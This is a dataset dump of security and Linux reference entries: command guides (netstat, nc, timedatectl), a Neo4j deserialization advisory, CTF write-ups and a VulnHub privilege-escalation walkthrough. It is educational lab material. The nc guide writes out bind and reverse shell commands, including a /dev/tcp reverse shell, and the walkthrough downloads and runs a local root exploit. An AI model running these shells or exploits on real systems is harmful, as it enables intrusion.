text
stringlengths
100
9.93M
category
stringclasses
11 values
netstat === 查看Linux中网络系统状态信息 ## 补充说明 **netstat命令** 用来打印Linux中网络系统的状态信息,可让你得知整个Linux系统的网络情况。 ### 语法 ```shell netstat(选项) ``` ### 选项 ```shell -a或--all:显示所有连线中的Socket; -A<网络类型>或--<网络类型>:列出该网络类型连线中的相关地址; -c或--continuous:持续列出网络状态; -C或--cache:显示路由器配置的快取信息; -e或--extend:显示网络其他相关信息; -F或--fib:显示FIB; -g或--groups:显示多重广播功能群组组员名单; -h或--help:在线帮助; -i或--interfaces:显示网络界面信息表单; -l或--listening:显示监控中的服务器的Socket; -M或--masquerade:显示伪装的网络连线; -n或--numeric:直接使用ip地址,而不通过域名服务器; -N或--netlink或--symbolic:显示网络硬件外围设备的符号连接名称; -o或--timers:显示计时器; -p或--programs:显示正在使用Socket的程序识别码和程序名称; -r或--route:显示Routing Table; -s或--statistice:显示网络工作信息统计表; -t或--tcp:显示TCP传输协议的连线状况; -u或--udp:显示UDP传输协议的连线状况; -v或--verbose:显示指令执行过程; -V或--version:显示版本信息; -w或--raw:显示RAW传输协议的连线状况; -x或--unix:此参数的效果和指定"-A unix"参数相同; --ip或--inet:此参数的效果和指定"-A inet"参数相同。 ``` ### 实例 **列出所有端口 (包括监听和未监听的)** ```shell netstat -a #列出所有端口 netstat -at #列出所有tcp端口 netstat -au #列出所有udp端口 ``` **列出所有处于监听状态的 Sockets** ```shell netstat -l #只显示监听端口 netstat -lt #只列出所有监听 tcp 端口 netstat -lu #只列出所有监听 udp 端口 netstat -lx #只列出所有监听 UNIX 端口 ``` **显示每个协议的统计信息** ```shell netstat -s 显示所有端口的统计信息 netstat -st 显示TCP端口的统计信息 netstat -su 显示UDP端口的统计信息 ​```shell **在netstat输出中显示 PID 和进程名称** ​```shell netstat -pt ``` `netstat -p`可以与其它开关一起使用,就可以添加“PID/进程名称”到netstat输出中,这样debugging的时候可以很方便的发现特定端口运行的程序。 **在netstat输出中不显示主机,端口和用户名(host, port or user)** 当你不想让主机,端口和用户名显示,使用`netstat -n`。将会使用数字代替那些名称。同样可以加速输出,因为不用进行比对查询。 ```shell netstat -an ``` 如果只是不想让这三个名称中的一个被显示,使用以下命令: ```shell netsat -a --numeric-ports netsat -a --numeric-hosts netsat -a --numeric-users ``` **持续输出netstat信息** ```shell netstat -c #每隔一秒输出网络信息 ``` **显示系统不支持的地址族(Address Families)** ```shell netstat --verbose ``` 在输出的末尾,会有如下的信息: ```shell netstat: no support for `AF IPX' on this system. netstat: no support for `AF AX25' on this system. netstat: no support for `AF X25' on this system. netstat: no support for `AF NETROM' on this system. ``` **显示核心路由信息** ```shell netstat -r ``` 使用`netstat -rn`显示数字格式,不查询主机名称。 **找出程序运行的端口** 并不是所有的进程都能找到,没有权限的会不显示,使用 root 权限查看所有的信息。 ```shell netstat -ap | grep ssh ``` 找出运行在指定端口的进程: ```shell netstat -an | grep ':80' ``` **通过端口找进程ID** ```bash netstat -anp|grep 8081 | grep LISTEN|awk '{printf $7}'|cut -d/ -f1 ``` **显示网络接口列表** ```shell netstat -i ``` 显示详细信息,像是ifconfig使用`netstat -ie`。 **IP和TCP分析** 查看连接某服务端口最多的的IP地址: ```shell netstat -ntu | grep :80 | awk '{print $5}' | cut -d: -f1 | awk '{++ip[$1]} END {for(i in ip) print ip[i],"\t",i}' | sort -nr ``` TCP各种状态列表: ```shell netstat -nt | grep -e 127.0.0.1 -e 0.0.0.0 -e ::: -v | awk '/^tcp/ {++state[$NF]} END {for(i in state) print i,"\t",state[i]}' ``` 查看phpcgi进程数,如果接近预设值,说明不够用,需要增加: ```shell netstat -anpo | grep "php-cgi" | wc -l ``` ## 扩展知识 ### 网络连接状态详解 **共有12中可能的状态**,前面11种是按照TCP连接建立的三次握手和TCP连接断开的四次挥手过程来描述的: 1. LISTEN:首先服务端需要打开一个socket进行监听,状态为 LISTEN,侦听来自远方TCP端口的连接请求 ; 2. SYN_SENT:客户端通过应用程序调用connect进行active open,于是客户端tcp发送一个SYN以请求建立一个连接,之后状态置为 SYN_SENT,在发送连接请求后等待匹配的连接请求; 3. SYN_RECV:服务端应发出ACK确认客户端的 SYN,同时自己向客户端发送一个SYN,之后状态置为,在收到和发送一个连接请求后等待对连接请求的确认; 4. ESTABLISHED:代表一个打开的连接,双方可以进行或已经在数据交互了, 代表一个打开的连接,数据可以传送给用户; 5. FIN_WAIT1:主动关闭(active close)端应用程序调用close,于是其TCP发出FIN请求主动关闭连接,之后进入FIN_WAIT1状态, 等待远程TCP的连接中断请求,或先前的连接中断请求的确认; 6. CLOSE_WAIT:被动关闭(passive close)端TCP接到FIN后,就发出ACK以回应FIN请求(它的接收也作为文件结束符传递给上层应用程序),并进入CLOSE_WAIT, 等待从本地用户发来的连接中断请求; 7. FIN_WAIT2:主动关闭端接到ACK后,就进入了 FIN-WAIT-2,从远程TCP等待连接中断请求; 8. LAST_ACK:被动关闭端一段时间后,接收到文件结束符的应用程 序将调用CLOSE关闭连接,这导致它的TCP也发送一个 FIN,等待对方的ACK.就进入了LAST-ACK,等待原来发向远程TCP的连接中断请求的确认; 9. TIME_WAIT:在主动关闭端接收到FIN后,TCP 就发送ACK包,并进入TIME-WAIT状态,等待足够的时间以确保远程TCP接收到连接中断请求的确认; 10. CLOSING: 比较少见,等待远程TCP对连接中断的确认; 11. CLOSED: 被动关闭端在接受到ACK包后,就进入了closed的状态,连接结束,没有任何连接状态; 12. UNKNOWN:未知的Socket状态; **常见标志位** * SYN: (同步序列编号,Synchronize Sequence Numbers)该标志仅在三次握手建立TCP连接时有效。表示一个新的TCP连接请求。 * ACK: (确认编号,Acknowledgement Number)是对TCP请求的确认标志,同时提示对端系统已经成功接收所有数据。 * FIN: (结束标志,FINish)用来结束一个TCP回话.但对应端口仍处于开放状态,准备接收后续数据。
sec-knowleage
egrep === 在文件内查找指定的字符串 ## 补充说明 **egrep命令** 用于在文件内查找指定的字符串。egrep执行效果与`grep -E`相似,使用的语法及参数可参照grep指令,与grep的不同点在于解读字符串的方法。egrep是用extended regular expression语法来解读的,而grep则用basic regular expression 语法解读,extended regular expression比basic regular expression的表达更规范。 ### 语法 ```shell egrep(选项)(查找模式)(文件名1,文件名2,……) ``` ### 实例 显示文件中符合条件的字符。例如,查找当前目录下所有文件中包含字符串"Linux"的文件,可以使用如下命令: ```shell egrep Linux * ``` 结果如下所示: ```shell # 以下五行为 testfile 中包含Linux字符的行 testfile:hello Linux! testfile:Linux is a free Unix-type operating system. testfile:This is a Linux testfile! testfile:Linux testfile:Linux # 以下两行为testfile1中含Linux字符的行 testfile1:helLinux! testfile1:This a Linux testfile! # 以下两行为 testfile_2 中包含Linux字符的行 testfile_2:Linux is a free unix-type opterating system testfile_2:Linux test ``` 过滤注释行和空白行 ```shell egrep -v '^\s*(#|$)' filename ```
sec-knowleage
# Neo4j Shell Server `setSessionVariable` Deserialization (CVE-2021-34371) [中文版本(Chinese version)](README.zh-cn.md) Neo4j is a graph database management system developed by Neo4j, Inc. Neo4j through 3.4.18 (with the shell server enabled) exposes an RMI service that arbitrarily deserializes Java objects, e.g., through setSessionVariable. An attacker can abuse this for remote code execution because there are dependencies with exploitable gadget chains. Neo4j Shell is replaced by Cyber Shell after Neo4j 3.5. References: - https://www.exploit-db.com/exploits/50170 - https://github.com/mozilla/rhino/issues/520 ## Vulnerable Environment If you are using Linux or OSX, you can execute the following command to start a Neo4j 3.4.18: ``` TARGET_IP=<your-ip> docker compose up -d ``` Environment `TARGET_IP` is a configuration to describe the Neo4j's hostname. If you are using Windows, update the content of `docker-compose.yml` and modify the environment manually. Once the service is started, visit `http://your-ip:7474` to see the web management page, but what we need to attack is port 1337, which is the Neo4j Shell port and uses the RMI protocol to communicate. ## Exploit Sending RMI request through the [Rhino Gadget](rhino_gadget/): ![](1.png) `touch /tmp/success5` has been successfully executed: ![](2.png)
sec-knowleage
timedatectl === 用于在 Linux 中设置或查询系统时间、日期和时区等配置。 ## 补充说明 在 Linux 运维中,通常使用此命令来设置或更改当前的日期、时间和时区,或启用自动系统时钟与远程 NTP 服务器同步,以确保 Linux 系统始终保持正确的时间。 ## 概要 ```shell timedatectl [OPTIONS...] COMMAND ... ``` ## 主要用途 - 转换时间到选定的格式,默认为当前。 - 设置系统时间。 ## 参数 ```shell Query or change system time and date settings. -h --help 显示帮助信息。 --version 显示软件包版本。 --no-pager 不用将输出通过管道传输到寻呼机(pager)。 --no-ask-password 不提示输入密码。 -H --host=[USER@]HOST 在远程主机上操作 -M --machine=CONTAINER 在本地容器上操作。 --adjust-system-clock 更改本地 RTC 模式时调整系统时钟。 --monitor 监控systemd-timesyncd的状态 -p --property=NAME 仅显示此名称的属性 -a --all 显示所有属性,包括空属性 --value 显示属性时,只打印值 Commands: status 显示当前的时间设置。 set-time TIME 设置系统时间。 set-timezone ZONE 设置系统时区。 list-timezones 显示已知时区。 set-local-rtc BOOL 控制 RTC 是否在当地时间。(BOOL 的值可以是 1 / true 或 0 / false) set-ntp BOOL 启用或禁用网络时间同步。(BOOL 的值可以是 1 / true 或 0 / false) timesync-status 显示 systemd-timesyncd 的状态。 show-timesync 显示 systemd-timesyncd 的属性。 ``` ## 例子 显示系统当前时间和日期 ```shell $ timedatectl status Local time: 五 2022-04-08 17:06:40 CST Universal time: 五 2022-04-08 09:06:40 UTC RTC time: 五 2022-04-08 17:04:02 Time zone: Asia/Shanghai (CST, +0800) NTP enabled: n/a NTP synchronized: no RTC in local TZ: yes DST active: n/a ``` 显示系统所有可用的时区 ```shell $ timedatectl show Unknown operation show $ timedatectl list-timezones Africa/Abidjan Africa/Accra Africa/Addis_Ababa ``` 将本地时区从上海(Asia/Shanghai)设置为阿姆斯特丹(Europe/Amsterdam) ```shell $ timedatectl set-timezone "Europe/Amsterdam" ``` 将本地时区设置为协调世界时(UTC) ```shell $ timedatectl set-timezone UTC ``` 设置系统时间(格式:HH:MM:SS) ```shell $ timedatectl set-time "07:25:46" ``` 设置系统日期(格式:YYYY-MM-DD) ```shell $ timedatectl set-time "2021-12-12" ``` 如果只设置日期,那么时间将默认设置为 “00:00:00″(建议同时设置日期和时间) ```shell $ timedatectl set-time "2021-12-12 07:25:46" ``` 将硬件时钟(RTC)设置为本地时区(不建议,RTC 时钟统一使用 UTC 更恰当,避免在时区更改和夏令时调整方面产生各种问题) ```shell $ timedatectl set-local-rtc 1 ``` 将硬件时钟(RTC)设置为协调世界时间(UTC) ```shell $ timedatectl set-local-rtc 0 ``` 启用 NTP 自动时间同步 ```shell $ timedatectl set-ntp true ``` 禁用 NTP 自动时间同步 ```shell $ timedatectl set-ntp false ``` 查看 systemd-timesyncd 服务的状态 ```shell $ timedatectl timesync-status Server: 91.189.94.4 (ntp.ubuntu.com) Poll interval: 17min 4s (min: 32s; max 34min 8s) Leap: normal Version: 4 Stratum: 2 Reference: 91EECB0E Precision: 1us (-23) Root distance: 29.922ms (max: 5s) Offset: +2.497ms Delay: 199.540ms Jitter: 5.834ms Packet count: 6 Frequency: +13.039ppm ``` `systemd-timedated` 可能默认配置了谷歌的 NTP 服务器(如 time1.google.com),为了顺利完成网络时间同步,您可以编辑 `/etc/systemd/timesyncd.conf` 文件添加自己的 NTP 服务器地址。
sec-knowleage
# 编译内核驱动 这里我们来尝试编译一个驱动模块。驱动代码如下 ```c #include <linux/init.h> #include <linux/module.h> #include <linux/kernel.h> MODULE_LICENSE("Dual BSD/GPL"); static int ko_test_init(void) { printk("This is a test ko!\n"); return 0; } static void ko_test_exit(void) { printk("Bye Bye~\n"); } module_init(ko_test_init); module_exit(ko_test_exit); ``` Makefile 文件如下 ```makefile obj-m += ko_test.o KDIR =/home/iromise/dev/kernel/linux-5.4.98/ all: $(MAKE) -C $(KDIR) M=$(PWD) modules clean: rm -rf *.o *.ko *.mod.* *.symvers *.order ``` 这里简单介绍一下这个 Makefile - `obj-m` 指定要声称哪些模块 - `KDIR` 用来标识内核源码目录,提供驱动编译所需环境 - `$(MAKE) -C $(KDIR) M=$(PWD) modules` - `-C` 表示进入到指定的内核目录 - `M` 指定驱动源码的环境,M 并不是 Makefile 的选项,而是内核根目录下 Makefile 中使用的变量。这会使得该 Makefile 在构造模块之前返回到 M 指定的目录,并在指定的目录中生成驱动模块。 编译驱动 ```bash make ```
sec-knowleage
# Intelligence Api * Category: Web * 100 points ## Description > Intelligence officers pay attention. The police will not remain behind. > Our recently released API lets you get information before starting a mission. > Stay put! ## Solution A website was attached. It said: ```html <div class="col-md-12"> <span class="head-main">NOW OR NEVER</span> <h3 class="head-last">Detective Angel, enter your id to get the intell for your task!</h3> </div> ``` There was a form used to get intel given a detective name: ```html <section class="for-full-back color-white" id="about-intell"> <div class="container"> <div class="row text-left g-pad-bottom"> <div class="col-md-8 col-md-offset-2 "> <input type="text" name="detective_name" id="detective_name"> <input type="button" onclick="get_intell()" value="Get Intell!"/> <p id="message"></p> <p id="error"></p> </div> </div> </div> </section> <!-- ... --> <script> async function get_intell() { var detective_name = document.getElementById("detective_name").value; var url = `/api/v2/detective/${detective_name}`; // Default options are marked with * const response = await fetch(url, { method: "GET", // *GET, POST, PUT, DELETE, etc. mode: "cors", // no-cors, *cors, same-origin cache: "no-cache", // *default, no-cache, reload, force-cache, only-if-cached credentials: "same-origin", // include, *same-origin, omit headers: { "Content-Type": "application/json", // 'Content-Type': 'application/x-www-form-urlencoded', }, redirect: "follow", // manual, *follow, error referrerPolicy: "no-referrer", // no-referrer, *no-referrer-when-downgrade, origin, origin-when-cross-origin, same-origin, strict-origin, strict-origin-when-cross-origin, unsafe-url //body: JSON.stringify(data), // body data type must match "Content-Type" header }) .then(response => response.json()) .then(data => displayMessage(JSON.stringify(data))) .catch(error => {displayError("*** in the catch() method *** " + error); return false; //document.getElementById("detective_name").value=""; } ); } function displayError(msg) { var html_data = "<div>" + "An Error has occured" + msg; document.getElementById("message").innerHTML=html_data; //document.getElementById("detective_name").value=""; } function displayMessage(msg) { var dataobg = JSON.parse(msg)[0];//['detective_name']; var html_data ="<div>Wrong Detective!"; if (dataobg){ html_data = "<div>Detective Name: " + dataobg['detective_name'] + "<br/>"; html_data += "Suspect Name: " + dataobg['suspect_name'] + "<br/>"; html_data += "Suspect Address: " + dataobg['suspect_addr'] + "<br/>"; html_data += "Suspect Spouse Name: " + dataobg['suspect_spouse'] + "<br/>"; html_data += "Suspect Details: " + dataobg['suspect_details'] + "<br/>"; html_data += "Suspect Point Of Interaction: " + dataobg['suspect_point_of_interaction'] + "<br/>"; html_data += "Time Of Interaction: " + dataobg['suspect_hour_of_interaction'] + "<br/>"; html_data+="</div>" } document.getElementById("message").innerHTML=html_data; } </script> ``` Let's try to get the intel for Angel: ```console ┌──(user@kali)-[/media/sf_CTFs/appsec/Intelligence_Api] └─$ curl 'https://intel-api.appsecil.ctf.today/api/v2/detective/Angel' [] ``` An empty array as a response means that the UI will display `Wrong Detective!`. At the end of the source code, there's an interesting comment: ```html <!--delete delete delete 777--> ``` Let's try that: ```console ┌──(user@kali)-[/media/sf_CTFs/appsec/Intelligence_Api] └─$ curl 'https://intel-api.appsecil.ctf.today/api/v2/detective/777' [{"detective_id":"777","detective_name":"Detecive Angel","suspect_name":"Goerge the vicioius","suspect_addr":"The black way 111, City of terror","suspect_spouse":"Joahana give me hope","suspect_details":"Loves client side programming, dealing with pixels, get angry and kill someone","suspect_point_of_interaction":"The vicious way 222","suspect_hour_of_interaction":"0001"}] ``` Well, we found Angel! But what now? Maybe we can get a list of all detectives? ```console ┌──(user@kali)-[/media/sf_CTFs/appsec/Intelligence_Api] └─$ curl 'https://intel-api.appsecil.ctf.today/api/v2/detective/' <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>Error</title> </head> <body> <pre>Cannot GET /api/v2/detective/</pre> </body> </html> ``` Notice how the API is marked as `v2`. What about `v1`? ```console ┌──(user@kali)-[/media/sf_CTFs/appsec/Intelligence_Api] └─$ curl 'https://intel-api.appsecil.ctf.today/api/v1/detective/' W3siZGV0ZWN0aXZlX2lkIjoiNzc3IiwiZGV0ZWN0aXZlX25hbWUiOiJEZXRlY2l2ZSBBbmdlbCIsInN1c3BlY3RfbmFtZSI6IkdvZXJnZSB0aGUgdmljaW9pdXMiLCJzdXNwZWN0X2FkZHIiOiJUaGUgYmxhY2sgd2F5IDExMSwgQ2l0eSBvZiB0ZXJyb3IiLCJzdXNwZWN0X3Nwb3VzZSI6IkpvYWhhbmEgZ2l2ZSBtZSBob3BlIiwic3VzcGVjdF9kZXRhaWxzIjoiTG92ZXMgY2xpZW50IHNpZGUgcHJvZ3JhbW1pbmcsIGRlYWxpbmcgd2l0aCBwaXhlbHMsIGdldCBhbmdyeSBhbmQgIGtpbGwgc29tZW9uZSIsInN1c3BlY3RfcG9pbnRfb2ZfaW50ZXJhY3Rpb24iOiJUaGUgdmljaW91cyB3YXkgMjIyIiwic3VzcGVjdF9ob3VyX29mX2ludGVyYWN0aW9uIjoiMDAwMSJ9LHsiZGV0ZWN0aXZlX2lkIjoiODg4IiwiZGV0ZWN0aXZlX25hbWUiOiJEZXRlY2l2ZSBEaW5nIERvbmciLCJzdXNwZWN0X25hbWUiOiJDaGFybGllIiwic3VzcGVjdF9hZGRyIjoiVGhlIGhhY2tlciB3YXkgNzc3LCBIYWNrbGVvbWEgIiwic3VzcGVjdF9zcG91c2UiOiJObyB3aWZlcywgd2hvIGhhcyB0aW1lIGZvciB0aGF0IEkgd2FudCB0byBoYWNrIHRoZSBwZXh0eGd4biIsInN1c3BlY3RfZGV0YWlscyI6IndoYXRldmVyIEkgY2FuIGhhY2sgQXBwU2VjLUlMezBsZF9AcDE1X2QxM19oQHJkfSIsInN1c3BlY3RfcG9pbnRfb2ZfaW50ZXJhY3Rpb24iOiJtYXJzIDc3NyIsInN1c3BlY3RfaG91cl9vZl9pbnRlcmFjdGlvbiI6IjA0MDEifV0= ``` This seems to return something! ```console ┌──(user@kali)-[/media/sf_CTFs/appsec/Intelligence_Api] └─$ curl 'https://intel-api.appsecil.ctf.today/api/v1/detective/' -s | base64 -d [{"detective_id":"777","detective_name":"Detecive Angel","suspect_name":"Goerge the vicioius","suspect_addr":"The black way 111, City of terror","suspect_spouse":"Joahana give me hope","suspect_details":"Loves client side programming, dealing with pixels, get angry and kill someone","suspect_point_of_interaction":"The vicious way 222","suspect_hour_of_interaction":"0001"},{"detective_id":"888","detective_name":"Detecive Ding Dong","suspect_name":"Charlie","suspect_addr":"The hacker way 777, Hackleoma ","suspect_spouse":"No wifes, who has time for that I want to hack the pextxgxn","suspect_details":"whatever I can hack AppSec-IL{0ld_@p15_d13_h@rd}","suspect_point_of_interaction":"mars 777","suspect_hour_of_interaction":"0401"}] ``` The response includes the flag!
sec-knowleage
# PumpkinGarden-WalkThrough --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- **靶机地址** - https://www.vulnhub.com/entry/mission-pumpkin-v10-pumpkingarden,321/ **Description** Mission-Pumpkin v1.0 is a beginner level CTF series, created by keeping beginners in mind. This CTF series is for people who have basic knowledge of hacking tools and techniques but struggling to apply known tools. I believe that machines in this series will encourage beginners to learn the concepts by solving problems. PumpkinGarden is Level 1 of series of 3 machines under Mission-Pumpkin v1.0. The end goal of this CTF is to gain access to PumpkinGarden_key file stored in the root account. **知识点** 无重要知识点 **实验环境** `环境仅供参考` - VMware® Workstation 15 Pro - 15.0.0 build-10134415 - kali : NAT 模式,192.168.141.134 - 靶机 : NAT 模式 --- 开始进行 IP 探活 ```bash nmap -sP 192.168.141.0/24 ``` 排除法,去掉自己、宿主机、网关,这里 `192.168.141.128` 是靶机的地址。 扫描开放端口 ```bash nmap -T5 -A -v -p- 192.168.141.128 ``` 从 nmap 的探测结果看,存在 ftp、http、ssh 服务,且 ftp 允许匿名登录,vsftpd 的版本是 2.0.8 或之后,也没找到可利用的漏洞 从 ftp 匿名登录入手 ``` ftp 192.168.141.128 anonymous 密码为空,直接回车 ls get note.txt bye ``` 看一下发现的 note.txt ``` cat note.txt Hello Dear! Looking for route map to PumpkinGarden? I think jack can help you find it. ``` 提示说 jack 可以帮助你,可能是个用户名。 看下 http 的情况 一个南瓜猫猫头,页面上没有可交互的内容, Ctrl+U 看下源码 ``` searching for the route map? Pumpkin images may help you find the way ``` 提示图片有些东西,访问 `/img` 路径下 像个 base64 ```bash echo "c2NhcmVjcm93IDogNVFuQCR5" | base64 -d scarecrow : 5Qn@$y ``` 看上去是 ssh 的账号密码,登上去试试 home 目录里的 note.txt 给出了 goblin Y0n$M4sy3D1t 这个账号密码,su 切换过去 按照 goblin home 目录 note 文件给出的提示 下载 https://www.securityfocus.com/data/vulnerabilities/exploits/38362.sh > 注 : 我访问报 503 Service Temporarily Unavailable ,下载 https://www.exploit-db.com/exploits/11651 这个也一样 > 注意 : https://www.exploit-db.com/exploits/11651 的存在 /bin/sh^M : bad interpreter 问题 kali 下载 payload ```bash wget https://www.exploit-db.com/download/11651 vim 11651 :set ff=unix :wq! python -m SimpleHTTPServer 8000 ``` 靶机下载,运行 ```bash cd wget 192.168.141.134:8000/11651 chmod +x 11651 ./11651 /bin/sh ``` --- 后台运行了删除脚本的命令 ```bash /bin/sh -c sleep 30; rm /home/goblin/*.* /bin/sh -c sleep 30; rm /tmp/* ``` 我这里是在 goblin 用户的 home 目录下运行的,且没给他后缀名,所以没受影响 :)
sec-knowleage
nc === nc是网络工具中的瑞士军刀 ## 补充说明 **nc命令** 全称**netcat**,用于TCP、UDP或unix域套接字(uds)的数据流操作,它可以打开TCP连接,发送UDP数据包,监听任意TCP 和UDP端口,同时也可用作做端口扫描,支持IPv4和IPv6,与Telnet的不同在于nc可以编写脚本。 ### 语法 ```shell nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<延迟秒数>][-o<输出文件>][-p<通信端口>] [-s<来源位址>][-v...][-w<超时秒数>][主机名称][通信端口...] ``` ### 选项 ```shell -4 只使用IPV4 -6 只使用IPV6 -c 使用tls连接或者监听 -D 启用socket调试开关 -g <网关> # 设置路由器跃程通信网关,最多可设置8个。 -G<指向器数目> # 设置来源路由指向器,其数值为4的倍数。 -h 在线帮助。 -i<延迟秒数> 设置时间间隔,以便传送信息及扫描通信端口。 -l 使用监听模式,管控传入的资料。 -n 直接使用IP地址,而不通过域名服务器。 -o<输出文件> # 指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存。 -p<通信端口> # 设置本地主机使用的通信端口。 -r 乱数指定本地与远端主机的通信端口。 -s<来源位址> # 设置本地主机送出数据包的IP地址。 -u 使用UDP传输协议。 -v 显示指令执行过程。 -w<超时秒数> # 设置等待连线的时间。 -z 使用0输入/输出模式,只在扫描通信端口时使用。 ``` ### 实例 **TCP端口扫描** ```shell [root@localhost ~]# nc -v -z -w2 192.168.0.3 1-100 192.168.0.3: inverse host lookup failed: Unknown host (UNKNOWN) [192.168.0.3] 80 (http) open (UNKNOWN) [192.168.0.3] 23 (telnet) open (UNKNOWN) [192.168.0.3] 22 (ssh) open ``` 扫描192.168.0.3 的端口 范围是 1-100 **扫描UDP端口** ```shell [root@localhost ~]# nc -u -z -w2 192.168.0.3 1-1000 # 扫描192.168.0.3 的端口 范围是 1-1000 ``` **扫描指定端口** ```shell [root@localhost ~]# nc -nvv 192.168.0.1 80 # 扫描 80端口 (UNKNOWN) [192.168.0.1] 80 (?) open y //用户输入 ``` 查看从服务器到目的地的出站端口 443 是否被防火墙阻止 ```shell nc -vz acme-v02.api.letsencrypt.org 443 -w2 # Ncat: Version 7.50 ( https://nmap.org/ncat ) # Ncat: Connected to 23.77.214.183:443. # Ncat: 0 bytes sent, 0 bytes received in 0.07 seconds. ``` **文件传输** ```shell # 接收方提前设置监听端口与要接收的文件名(文件名可自定义): nc -lp 8888 > node.tar.gz # 传输方发文件: nc -nv 192.168.75.121 8888 < node_exporter-1.3.1.linux-amd64.tar.gz # ⚠️ 注意:192.168.75.121是接收方的ip地址。 ``` ```shell # 如果希望文件传输结束后自动退出,可以使用下面的命令: nc -lp 8888 > node.tar.gz nc -nv 192.168.75.121 8888 -i 1 < node_exporter-1.3.1.linux-amd64.tar.gz # ⚠️ 注意:-i 表示闲置超时时间 ``` **远程控制** ```shell # 正向控制,被控端主动设置监听端口及bash环境,控制端连接,如果有防火墙,需开放端口,否则会被拦截。 # 被控制端执行下面的命令: nc -lvnp 8888 -c bash # 控制端执行下面的命令: nc 192.168.75.121 8888 ``` ```shell # 反向控制,控制端设置监听端口,被控端主动连接控制端的ip及端口,并提供bash环境。 # 控制端执行下面的命令: nc -lvnp 8888 # 被控制端执行下面的命令: nc 192.168.75.121 8888 -c bash ``` **反弹shell** ```shell # 控制端执行下面的命令: nc -lvnp 8888 ``` ``` # 被控端执行下面的命令: bash -i &> /dev/tcp/192.168.75.121/8888 0>&1 ```
sec-knowleage
# Top Kek (crypto 50) ###ENG [PL](#pl-version) In the task we get encrypted data: ``` KEK! TOP!! KEK!! TOP!! KEK!! TOP!! KEK! TOP!! KEK!!! TOP!! KEK!!!! TOP! KEK! TOP!! KEK!! TOP!!! KEK! TOP!!!! KEK! TOP!! KEK! TOP! KEK! TOP! KEK! TOP! KEK!!!! TOP!! KEK!!!!! TOP!! KEK! TOP!!!! KEK!! TOP!! KEK!!!!! TOP!! KEK! TOP!!!! KEK!! TOP!! KEK!!!!! TOP!! KEK! TOP!!!! KEK!! TOP!! KEK!!!!! TOP!! KEK! TOP!!!! KEK!! TOP!! KEK!!!!! TOP! KEK! TOP! KEK!!!!! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK!! TOP!! KEK!!! TOP! KEK! TOP!! KEK! TOP!! KEK! TOP! KEK! TOP! KEK! TOP!!!!! KEK! TOP!! KEK! TOP! KEK!!!!! TOP!! KEK! TOP! KEK!!! TOP! KEK! TOP! KEK! TOP!! KEK!!! TOP!! KEK!!! TOP! KEK! TOP!! KEK! TOP!!! KEK!! TOP! KEK!!! TOP!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK!!! TOP!! KEK!! TOP!!! KEK! TOP! KEK! TOP! KEK! TOP! KEK!! TOP!!! KEK!! TOP! KEK! TOP!!!!! KEK! TOP!!! KEK!! TOP! KEK!!! TOP!! KEK!!! TOP! KEK! TOP!! KEK!! TOP!!! KEK! TOP! KEK!! TOP! KEK!!!! TOP!!! KEK! TOP! KEK!!! TOP! KEK! TOP!!!!! KEK! TOP!! KEK! TOP!!! KEK!!! TOP!! KEK!!!!! TOP! KEK! TOP! KEK! TOP!!! KEK! TOP! KEK! TOP!!!!! KEK!! TOP!! KEK! TOP! KEK!!! TOP! KEK! TOP! KEK!! TOP! KEK!!! TOP!! KEK!! TOP!! KEK! TOP! KEK! TOP!!!!! KEK! TOP!!!! KEK!! TOP! KEK!! TOP!! KEK!!!!! TOP!!! KEK! TOP! KEK! TOP! KEK! TOP! KEK! TOP!!!!! KEK! TOP!! KEK! TOP! KEK!!!!! TOP!! KEK! TOP! KEK!!! TOP!!! KEK! TOP!! KEK!!! TOP!! KEK!!! TOP! KEK! TOP!! KEK! TOP!!! KEK!! TOP!! KEK!! TOP!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP!! KEK!! TOP!! KEK!! TOP!!! KEK! TOP! KEK! TOP! KEK! TOP!! KEK! TOP!!! KEK!! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK!! TOP! KEK! TOP!! KEK!! TOP!! KEK!! TOP!! KEK! TOP! KEK!! TOP! KEK! TOP!! KEK!! TOP! KEK!!!! TOP! KEK!! TOP! KEK!!!! TOP! KEK!! TOP! KEK!!!! TOP! KEK! TOP!!!!! KEK! TOP! ``` We initially thought this is some kind of esolang similar to Ook! but then we figured that it has to be simpler - there is only alternating `TOP` and `KEK` and `!` after them. After a while we finally guessed that this can be simply binary code with `TOP` or `KEK` signaling 0/1 and `!` signaling repeats. So we prepared a code: ```python import codecs with codecs.open("data.txt") as input_file: data = input_file.read() result = "" for entry in data.split(" "): repeat = len(entry) - 3 if entry[0] == "T": result += "1" * repeat else: result += "0" * repeat print(result) chunked = [result[i:i + 8] for i in range(0, len(result) - 7, 8)] print(chunked) converted = [chr(int(c, 2)) for c in chunked] print("".join(converted)) ``` Which gave us the flag: `flag{T0o0o0o0o0P______1m_h4V1nG_FuN_r1gHt_n0W_4R3_y0u_h4v1ng_fun______K3K!!!}` ###PL version W zadaniu dostajemy zakodowane dane: ``` KEK! TOP!! KEK!! TOP!! KEK!! TOP!! KEK! TOP!! KEK!!! TOP!! KEK!!!! TOP! KEK! TOP!! KEK!! TOP!!! KEK! TOP!!!! KEK! TOP!! KEK! TOP! KEK! TOP! KEK! TOP! KEK!!!! TOP!! KEK!!!!! TOP!! KEK! TOP!!!! KEK!! TOP!! KEK!!!!! TOP!! KEK! TOP!!!! KEK!! TOP!! KEK!!!!! TOP!! KEK! TOP!!!! KEK!! TOP!! KEK!!!!! TOP!! KEK! TOP!!!! KEK!! TOP!! KEK!!!!! TOP! KEK! TOP! KEK!!!!! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK!! TOP!! KEK!!! TOP! KEK! TOP!! KEK! TOP!! KEK! TOP! 